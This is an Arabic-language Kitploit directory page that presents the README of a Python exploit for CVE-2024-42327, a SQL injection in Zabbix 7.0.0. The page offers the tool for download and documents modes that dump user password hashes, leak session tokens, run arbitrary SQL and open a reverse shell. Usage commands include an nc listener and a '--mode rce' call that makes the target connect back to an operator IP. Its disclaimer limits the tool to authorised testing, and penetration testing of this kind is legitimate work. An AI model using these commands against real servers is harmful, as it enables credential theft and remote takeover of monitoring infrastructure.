Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-42327_Zabbix_SQLi — هذا لأغراض تعليمية فقط. من فضلك لا تستخدمه ضد أنظمة غير مصرح بها. | Kitploit
أدوات/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

هذا لأغراض تعليمية فقط. من فضلك لا تستخدمه ضد أنظمة غير مصرح بها.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ نص استغلال حقن SQL لـ Zabbix 7.0.0

نص بايثون لاستغلال ثغرة حقن SQL موثقة في Zabbix 7.0.0، يدعم أنماطًا متعددة من الإجراءات بما في ذلك استخراج بيانات المستخدمين، تسريب رموز الجلسة، تنفيذ الأوامر عن بعد (RCE)، وحقن استعلامات مخصصة.

⚠️ إخلاء مسؤولية:
هذا النص مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


✨ الميزات

  • ✅ حقن SQL موثق ضد Zabbix 7.0.0
  • 🧑‍💻 تفريغ تجزئة كلمات المرور للمستخدمين من قاعدة البيانات
  • 🔐 تسريب رموز الجلسة
  • 🐚 تنفيذ الأوامر عن بعد عبر شل عكسي (يتطلب رمز مسؤول)
  • 🧠 تشغيل استعلامات SQL مخصصة

🔧 المتطلبات

  • Python 3.6+
  • مكتبة requests

قم بتثبيت المتطلبات إذا لزم الأمر:

root@kitploit:~
pip install requests

🚀 الاستخدام

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 الأنماط المتاحة

ModeDescriptionRequires Admin Token
leak-usersيقوم بتفريغ جميع معرفات المستخدمين وأسماء المستخدمين وتجزئة كلمات المرور والأدوار❌
leak-tokensيقوم بتفريغ جميع معرفات الجلسات النشطة من قاعدة البيانات❌
rceينشئ شل عكسي عبر استغلال item.create✅
customتشغيل أي استعلام SQL مخصص عبر الحقن❌

🧪 أمثلة

تفريغ تجزئة كلمات المرور للمستخدمين

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

تسريب رموز الجلسة

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

تنفيذ الأوامر عن بعد (شل عكسي)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

حقن SQL مخصص

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 هيكل المشروع

root@kitploit:~
sqliZabbix.py      # Main exploit script
README.md          # This documentation

🧑‍💻 المؤلف

Anthony (@874anthony)

أُعدّ بحب وفضول 🐍

🔐 الترخيص

هذا المشروع صدر تحت رخصة MIT. يُرجى الاستخدام بمسؤولية.

تنزيل الأداة